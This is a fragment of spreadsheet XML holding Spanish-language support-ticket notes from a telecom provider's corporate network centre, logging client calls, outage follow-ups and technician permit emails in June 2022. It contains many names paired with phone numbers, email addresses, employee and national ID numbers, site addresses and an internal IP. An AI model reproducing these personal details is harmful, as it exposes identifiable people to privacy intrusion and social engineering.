    <t>SE CONTACTA CON CLIENTE MAX SOLANO 55116025 QUIEN INDICA QUE LAS OFICINAS EMPIEZAN A LABORAL DESDE LAS 8 AM, PERO COMENTA QUE ESTARA COORDINANDO A ALGUIEN PARA QUE APOYE CON LA REVISION, SOLICITA LLAMADA A LAS 8:20 AM
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4610219</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 10:20
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; RICARDO PEREZ MENDOZA &lt;RIPEREZ@ELEKTRA.COM.MX&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; MARCO ANTONIO HERNANDEZ RUEDA &lt;MAHERNANDEZ@BANCOAZTECA.COM.HN&gt;
CC: CENTRO DE ATENCION DE ENLACES &lt;CAE@AZTECASERVICIOS.COM&gt;; MIGUEL RUIZ GONZALEZ &lt;MRUIZ@ELEKTRA.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;
ASUNTO: RE: 7804 - PAZ QUIMISTAN || ID 1036961 || ENLACE INACTIVO PARA BANCO AZTECA
BUEN DÍA ESTIMADO CLIENTE, UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO AL PERSONAL TÉCNICO QUE SE PRESTARA EN SITIO.
DIRECCIÓN:  CENTRO DE QUIMISTAN, FRENTE AL PARQUE CENTRAL, ESQUINA OPUESTA A LA ESTACIÓN POLICIAL, LOCAL DE ESQUINA COLOR MARRON,HONDURAS
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS
NOMBRE ID EMPLEADO CONTACTO CEL ID
ERICK VLADIMIR REYES CARVAJAL 905928 97513335 1627-1995-00543
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4610222</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENE  JORGE GONZALEZ AL 32369359 SE SOLICITAN DATOS DE VISITA Y BRINDA LOS SIGUIENTES **
HORARIO DE ATENCION:  7:30 AM A 17:00 HRS
GESTION DE PERMISOS:  SOLO IDENTIFICADOS
DIRECCION:  RUTA NACIONAL CA-19 KM.173 JALAPA CARR A MONJAS JALAPA ADELANTE DEL INSTITUTO ADOLFO BEJUL.
ATENDERA EN SITIO:  JORGE GONZALEZ
-ID 1001340780
**</t>
  </si>
  <si>
    <t>F4610223</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LEOPOLDO LUIS  50293020 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001618064</t>
  </si>
  <si>
    <t>F4610229</t>
  </si>
  <si>
    <t>SE CUMPLE CON EL MONITOREO SOLICITADO POR CLIENTE. SE PROCEDE A CIERRE.</t>
  </si>
  <si>
    <t>F4610239</t>
  </si>
  <si>
    <t>LLAMADA YA COMPLETA AL 66444300, POR PARTE DE ACCESOS EMPRESARIALES NO SE REALIZO NINGUNA CORRECIÓN. POSIBLEMENTE ALGUN REINICIO DE RUTA POR PARTE DE TX, SE LE CONSULTARÁ AL CLIENTE DE IGUAL MANERA SI EL NO REINICIO SUS EQUIPOS. AL 66444300 NADIE CONTESTA Y AL FINAL DA UN TONO DE FAX
1001337464
COLA:
NOMBRE: A: 66444300
NÚMERO: 66444300
DURACIÓN: 0:00:04
ESTADO: MARCANDO
DETALLES: 66444300
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 21/06/2022 08:26:58</t>
  </si>
  <si>
    <t>F4610266</t>
  </si>
  <si>
    <t>SE NOTIFICA A CLIENTE
DE: WILLIAM GABRIEL SANAVRIA
ENVIADO: MARTES, 21 DE JUNIO DE 2022 09:53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C_BANRURAL_GT_AGENCIA_0362
ESTIMADO CLIENTE:
LE SALUDO CORDIALMENTE, ASÍ MISMO INFORMAMOS QUE TENEMOS UNA ALARMA PROACTIVA CON RESPECTO AL SIGUIENTE SERVICIO EL CUAL ESTÁ SIENDO AFECTADO POR FALLA MASIVA EN EL ÁREA:
MASIVA: F4610478
TICKET: F4610266
ID: 8901339T
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_0362
UBICADO EN: REDUNDANCIA.- AGE.362- AVENIDA BOLIVAR, AVENIDA BOLIVAR 33-30 ZONA 3
NUESTRO EQUIPO TÉCNICO YA ESTÁ TRABAJANDO PARA SOLUCIONAR EL INCONVENIENTE,</t>
  </si>
  <si>
    <t>F4610268</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS FUNEZ AL 70655316 - 70001261 SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
-ID  1001338546 - 1001338434
**</t>
  </si>
  <si>
    <t>F4610276</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NELSY LOPEZ 94568245 PERO ENVIA DIRECTAMENTE A BUZON
-ID 1001344406</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDGAR 94358437 MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO
-ID 1001345288</t>
  </si>
  <si>
    <t>F4610280</t>
  </si>
  <si>
    <t>SE LLAMAA A CLIENTE NANI-30616240 ##
1001358786
COLA:
NOMBRE: A: 30616240
NÚMERO: 011 50230616240
DURACIÓN: 0:00:26
ESTADO: CONECTADA
DETALLES: +50230616240
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 21/06/2022 09:32:18</t>
  </si>
  <si>
    <t>F4610285</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ROBERTO DIMAS 75689350-76822366 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE UBCIA ASMI 52L EL CUAL INDICA QUE PWR -VERDE ALM - ROJO SYNC - ROJO CLIENTE NOS APOYA CON REINICIAR EL EQUIPO PERO AUN PERSISTE LAS ALARMAS, SE LE INDICA QUE SE ENVIARA PERSONAL TECNICO A REALIZAR PRUEBAS CON LOS EQUIPOS Y LA UM, NO ES NECESARIO TRAMITAR PERMISOS UNICAMENTE QUE LLEGUEN RAPIDO, SE PROCEDE CON LA COORDINACION DE PERSONAL TECNICO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBERTO DIMAS 75689350 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001407201</t>
  </si>
  <si>
    <t>F4610289</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ESTEFANI GOMEZ 41949623 MENCIONA QUE PERSISTE EL INCONVENIENTE
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001349767</t>
  </si>
  <si>
    <t>F4610291</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTEFANI GOMEZ 41949623 MENCIONA QUE ANOCHE PRESENTARON VARIOS APAGONES DE ENERGIA ELECTRICA
CLIENTE APLICA REINICIO A LOS EQUIPOS PERO EL INCONVENIENTE PERSISTE
-ID 1001349767
NOMBRE DEL CLIENTE: RAPIFARMA, SOCIEDAD ANONIMA
UBICACIÓN:KILOMETRO 16CARRETERA A EL SALVADOR ALDEA DON JUSTO ZONA 8 COMERCIAL PLAZA PUNTO LUCAL 9
CONTACTO EN SITIO: ESTEFANI GOMEZ 41949623
HORARIO DE ATENCION:8:00 - 21:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4610294</t>
  </si>
  <si>
    <t>SE LLAMA A CLINTE LUIS CARLOS 84198398 RESPONDE PERO CORTA LA LLAMADA
-ID 1001399081</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OLIVER SUAREZ 86007058 MENCIONA QUE PERSISTE EL INCONVENIENTE
CLIENTE CONFIRMA QUE EN PR TODO ESTA BIEN CON LA ANERGIA
-ID 1001400193
UBICACIÓN:ENTRADA A LA CALLE DEL AMOR EDIFICIO MORCA PLANTA BAJA, RIVAS
CONTACTO EN SITIO: OLIVER SUAREZ 86007058
HORARIO DE ATENCION:8:00 - 17:00
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS
*-*-*-</t>
  </si>
  <si>
    <t>F4610327</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRYAN ESPINO 63117530 MENCIONA QUE PERSISTE EL INCONVENIENTE
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001363177</t>
  </si>
  <si>
    <t>F4610331</t>
  </si>
  <si>
    <t>SELLAMA A CLIENTE 87481736 PARA BRINDAR RETROALIMENTACION
-ID 1001419070</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  87481736 MENCIONA QUE PERSISTE EL INCONVENIENTE
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001368208</t>
  </si>
  <si>
    <t>F4610332</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAMY CALEL 55167233 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001356605</t>
  </si>
  <si>
    <t>F4610347</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CARLOS TZUL 59783672 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001356143</t>
  </si>
  <si>
    <t>F4610348</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAYRO REYES 59925063 MENCION QUE DESDE ANOCHE NO CUENTAN CON ENERGIA EN PR
-ID 1001358149</t>
  </si>
  <si>
    <t>F4610369</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  71231953  MENCIONA QUE PERSISTE EL INCONVENIENTE PERO CLIENTE NO APOYA EN REALIZAR PRUEBAS
CLIENTE ESTA SOLICITANDO VISITA
-ID 1001620491
NOMBRE DEL CLIENTE: ALL BUSINESS LOGISTICS SUPPORT SA DE CV
UBICACIÓN:CALLE SAN ANTONIO ABAB PASAJE VALDIVIESO NO 15, SAN SALVADOR
CONTACTO EN SITIO:ALEXIS ENRIQUEZ - 77431292
HORARIO DE ATENCION:CLIENTE SOLICITA VISITA LO MAS PRONTO POSIBLE
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4610372</t>
  </si>
  <si>
    <t>--- WALTER ANIBAL REYES CLIENTE), CONFIRMA SERVICIO, AUTORIZA EL CIERRE, SE INFORMA A CNOC REACTIVO POR SKYPE .---
RESULTADO: LLAMADA HECHA
NOMBRE: 45787911
NÚMERO: 45787911
INICIO: HOY, 16:41
FIN: HOY, 17:06
DURACIÓN: 24:55
ID DE LLAMADA: 1001505380
...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 77566759 - 54132744 MENCIONA QUE ESTAN PRESENTANDO LENTITUD
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001388141 - 1001388375</t>
  </si>
  <si>
    <t>F4610376</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALBA PALACIOS 58754063 SE LE BRINDA DIAGNOSTICO Y MENCIONA QUE DARA SEGUIMIENTO CON SU IT
-ID 1001359196</t>
  </si>
  <si>
    <t>F4610378</t>
  </si>
  <si>
    <t>SE NOTIFICA A CLIENTE
DE: WILLIAM GABRIEL SANAVRIA
ENVIADO: MARTES, 21 DE JUNIO DE 2022 09:4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C_BANRURAL_GT_AGENCIA_0443
ESTIMADO CLIENTE:
LE SALUDO CORDIALMENTE, ASÍ MISMO INFORMAMOS QUE TENEMOS UNA ALARMA PROACTIVA CON RESPECTO AL SIGUIENTE SERVICIO EL CUAL ESTÁ SIENDO AFECTADO POR FALLA MASIVA EN EL ÁREA:
MASIVA: F4610478
TICKET: F4610378
ID: 8901358T
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_0443
UBICADO EN: REDUNDANCIA - 12 CALLE 7-68 ZONA 18 SAN RAFAEL LA LAGUNA I
NUESTRO EQUIPO TÉCNICO YA ESTÁ TRABAJANDO PARA SOLUCIONAR EL INCONVENIENTE,</t>
  </si>
  <si>
    <t>F4610392</t>
  </si>
  <si>
    <t>CLIENTE ERICK CONFIRMA QUE ELLOS NO UTILIZAN LOS NUMEROS PILOTO POR ESO NO COMPLETAN.
1001567464
COLA:
NOMBRE: A: 35706776
NÚMERO: 35706776
DURACIÓN: 0:01:32
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 35706776
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 22/06/2022 08:52:35</t>
  </si>
  <si>
    <t>F4610401</t>
  </si>
  <si>
    <t>F4610405</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE AMERICA RODRIGUEZ QUIEN INIDICA QUE YA HABLO CON EL PROVEEDOR. SOLICITA EL CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE AMERICA RAMIREZ A QUIEN SE LE INDICO QUE TIENE QUE HABLAR CON SU PROVEEDOR.
CLIENTE ENTERADO Y ESTARA LLAMANDO AL PROVEEDOR.</t>
  </si>
  <si>
    <t>F4610406</t>
  </si>
  <si>
    <t>F4610413</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78467645 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
CLIENTE MENCIONA QUE PRESENTARON UN CORTE DE ENERGIA
-ID 1001392987</t>
  </si>
  <si>
    <t>F4610426</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GILBERTO SANCHEZ 25071250 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001476820</t>
  </si>
  <si>
    <t>F4610437</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE IVAN GALAN 55913372 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001366106</t>
  </si>
  <si>
    <t>F4610445</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO BERNAL 22344244  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001395629</t>
  </si>
  <si>
    <t>F4610459</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS ROBLES 58794781 MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMADA EN 15 MIN
-ID 1001396530</t>
  </si>
  <si>
    <t>F4610474</t>
  </si>
  <si>
    <t>CLIENTE EDWIN 54042195 REALIZA PRUEBAS Y  VALIDA EL ENLACE OPERATIVO. AUTORIZA EL CIERRE DEL CASO. ID: 1001380853</t>
  </si>
  <si>
    <t>F4610475</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL ADJUNTANDO EL RFO Y SOLICITANDO CIERRE DE SD --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 23 DE JUNIO DE 2022 05:38
PARA: BCATELLANOS@MAPFRE.COM.GT
CC: DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: DICTAMEN ID 780300001 || QUETZAL ASISTENCIA -MAPFRE 3-90 ZONA 14, EDIF LA RAMBLA 5TO NIVEL || TICKET SD1137087 ||
BUENOS DÍAS ESTIMADO SR. CASTELLANOS.
                ADJUNTO EL DICTAMEN TÉCNICO PARA EL TICKET SD1137087.
CON LA ENTREGA DEL DOCUMENTO SE PROCEDE CON EL CIERRE DEL TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRYAN CASTELLANOS 58097654 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001377049</t>
  </si>
  <si>
    <t>SE ENVIA SOLICITUD DE PARA LA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 12:15
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;
ASUNTO: QUETZAL ASISTENCIA -MAPFRE || 780300001T || SD1137087
BUENA TARDE
     SOLICITO DE SU AMABLE APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA 	ID 	TICKET
QUETZAL ASISTENCIA -MAPFRE
780300001T
SD1137087 - F4610475
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4610491</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE OMAR CAMPOS QUIEN ESTA UBICANDO LOS EQUIPOS.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>F4610501</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FLORES AL 32851193 CONTESTA UNA SEÑORITA Y SOLICITA QUE SE LE LLAME A GABRIELA AL  95968252 SE LLAMA Y CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001443859 - 1001444639
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FLORES 32851193 PARA BRINDAR RETROALIMENTACION
-ID 1001397950</t>
  </si>
  <si>
    <t>F4610525</t>
  </si>
  <si>
    <t>SE ESTA EN LINEA CON EL CLIENTE SULMA QUIEN PROCEDE A REALIZAR PRUEBAS.
1001384892
COLA:
NOMBRE: A: 23615747
NÚMERO: 23615747
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 23615747
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 21/06/2022 10:40:25</t>
  </si>
  <si>
    <t>F4610538</t>
  </si>
  <si>
    <t>ACTUALMENTE ENLACE SE OBSERVA OPERTIVO DESDE, AUN NO SE CUENTA CON RESPUESTA POR PARTE DE CLIENTE VIA CORREO SE VUELTE A ENVIAR CORREO DE SEGUIMIENTO || SE LLAMARA A PERSONAL DE LA CENTRAL DE BANRURAL EN HORARIO HABIL PARA CONSULTARA SI HAN RECEPCIONADO EL CORREO.
NODE STATUS 	REACHABLE
SYSTEM NAME 	CC_BANRURAL_GT_AGENCIA_0251
IP ADDRESS 	10.212.120.142
COUNTRY 	GUATEMALA
PROPERTY 	CUSTOMER
GROUP 	CC_BANRURAL_VIP
CUSTOMER 	
LOCATION 	IZABAL
BUSINESS SERVICE 	
SERVICE STATUS 	PRODUCTION
TYPE 	ROUTER
MODEL 	CISCOROUTER
UPTIME 	2 DAYS, 8:38:41
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 23 DE JUNIO DE 2022 20:11PARA: KENNY ROBERT RIVERA JUAREZ &lt;KENNY.RIVERA@CLARO.COM.GT&gt;; AGE251@BANRURAL.COM.GT &lt;AGE251@BANRURAL.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 TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;ASUNTO: RE: ENLACE ALARMADO CON REINCIDENCIA CC_BANRURAL_GT_AGENCIA_0251
ESTIMADO CLIENTE,
FAVOR SU APOYO INDICANDO FECHA TENTATIVA DE INSTALACIÓN DE UPS EN AGENCIA YA QUE DE ESTA FORMA SE BRINDARÁ UNA PROTECCIÓN ADECUADA DE LOS EQUIPOS DE RED ANTE INTERRUPCIONES DEL SUMINISTRO ELÉCTRICO EN EL SECTOR DISMINUYENDO LA POSIBILIDAD DE DAÑOS A LOS MISMOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO A CLIENTE || HEMOS TENIDO REINCIDENCIA EN EL MONITOREO PROACTIVO DEBIDO A LOS CONSTANTES REINICIOS. SE HABLÓ CON EL GERENTE DE LA AGENCIA OTTO MENCHEN QUIEN COMENTA QUE NO CUENTAN CON UPS Y LA ENERGÍA EN EL SECTOR ES INESTABLE.
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
SOLICITAMOS SU APOYO CON LO REQUERIDO EN CORREO ANTERIOR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4610539</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  WALTER REYES 45787911 MENCIONA QUE YA TODO ESTA FUNCIONANDOC ORRECTAMENTE
-ID 1001472597</t>
  </si>
  <si>
    <t>F4610545</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  WALTER REYES 45787911 MENCIONA QUE ESCALO EL CASO A NIVEL INTERNO POR LO QUE SOLICITA NO SE CIERRE EL TICKET HASTA TENER RESPUESTA POR PARTE DE CLIENTE
-ID 1001472597</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001408929</t>
  </si>
  <si>
    <t>--- WALTER ANIBAL REYES CLIENTE), CONFIRMA SERVICIO, AUTORIZA EL CIERRE, SE CAMBIA DE ESTADO Y SE INFORMA A CNOC PROACTIVO POR SKYPE .---
RESULTADO: LLAMADA HECHA
NOMBRE: 45787911
NÚMERO: 45787911
INICIO: HOY, 16:41
FIN: HOY, 17:06
DURACIÓN: 24:55
ID DE LLAMADA: 1001505380
...</t>
  </si>
  <si>
    <t>F4610547</t>
  </si>
  <si>
    <t>F4610552</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE LOPEZ 32847671 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001410805</t>
  </si>
  <si>
    <t>F4610553</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAN HIDALGO 43932255 MENCIONA YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001411897</t>
  </si>
  <si>
    <t>F4610557</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILSON MARROQUIN 25930026 RESPONDE SEÑORITA(NO BRINDA NOMBRE) INDICA QUE NO TIENE INFORMACION DEL REPORTE, ESTARA VALIDANDO CON SU IT
-ID 1001412409</t>
  </si>
  <si>
    <t>F4610572</t>
  </si>
  <si>
    <t>**SE LLAMA A ERNESTO MARTINEZ - MARTA ELIAS 25930014 CONTESTA LA SEÑORITA  RIVERA SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 1001416439
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARTHA CASTILLO 25913485 PERO SUENA DESCONECTADO
-ID 1001555851</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 25930014 MENCIONA QUE ELLOS ESTAN ORDENANDO LOS CABLES A NIVEL INTERNO CON SU IT
SE LE MENCIONA QUE A NIVEL DE CLARO EL SERVICIO ESTA OPERATIVO Y ESTABLE
-ID 1001558464</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARTHA CASTILLO AL 25913485 NO CONTESTA SE INTENTARA LUEGO **
-ID 1001503370
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO MARTINEZ AL 25930014 NO RESPONDE SE INTENTARA LUEGO **
-ID 1001502930
**</t>
  </si>
  <si>
    <t>F4610574</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARTHA CASTILLO AL 25913485  INDICA QUE LO SIGUE VIENDO DOWN Y QUIERE SABER SI SE HIZO ALGO O SE CAMBIO LA INTERFAZ YA QUE VE CAIDA LA VLAN 1 Y LOS INTERFACES DE LA WAN DE ESE SITIO A NIVEL MONITOREO DE NOSOTROS DICE QUE LO VE DOWN || SE NOTIFICA A AGESTOR**
-ID 1001408861
**</t>
  </si>
  <si>
    <t>F4610575</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 15:03
PARA: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;; GESTION.INCIDENTES@BANCOCUSCATLAN.COM &lt;GESTION.INCIDENTES@BANCOCUSCATLAN.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTIÓN DE PERMISOS | IP2145150SV |BANCO CUSCATLAN DE EL SALVADOR S.A. | SAN MIGUELBO. LA MERCEDAVENIDA ROOSEVELT SURFTE A HOTEL TROPICO INN
*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JULIO BERNAL 78514073 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001503454</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RODRIGO OSORIO AL 22023100  - 78514073 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001407287 - 1001407546
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO BERNAL 78514073 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001476228</t>
  </si>
  <si>
    <t>###SE MANDA CORREO AL CLIENTE PARA GESTIONAR PERMISOS##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MARTES, 21 DE JUNIO DE 2022 13:34
PARA: GESTION.INCIDENTES@BANCOCUSCATLAN.COM &lt;GESTION.INCIDENTES@BANCOCUSCATLAN.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | IP2145150SV |BANCO CUSCATLAN DE EL SALVADOR S.A. | SAN MIGUELBO. LA MERCEDAVENIDA ROOSEVELT SURFTE A HOTEL TROPICO INN
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO IP2145150SV |BANCO CUSCATLAN DE EL SALVADOR S.A.   | SAN MIGUELBO. LA MERCEDAVENIDA ROOSEVELT SURFTE A HOTEL TROPICO INN
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
00815933-2 10805 MANUEL GARCIA
04339969-2 10701 HECTOR IVAN
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4610577</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JUAN PABLO AGUILAR 44460306  PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001560343</t>
  </si>
  <si>
    <t>F4610588</t>
  </si>
  <si>
    <t>SIN RESPUESTA AL CORREO ENVIADO, SE SOLICITA NUEVAMENTE RESPUESTA AL CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MARTES, 21 DE JUNIO DE 2022 18:52PARA: WILLIAM GABRIEL SANAVRIA &lt;WILLIAM.SANAVRIA@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; SERVICIOS5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;; ERWIN CHOQUIN &lt;ECHOQUIN@5B.COM.GT&gt;; CARLOS SOSA &lt;CSOSA@5B.COM.GT&gt;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ASUNTO: RE: ENLACE ALARMADO CON REINCIDENCIA CC_TYT_GT_ATM844
ESTIMADO CLIENTE,
FAVOR SU APOYO BRINDANDO RESPUESTA AL CORREO ANTERIOR.
SALUDOS CORDIALES.
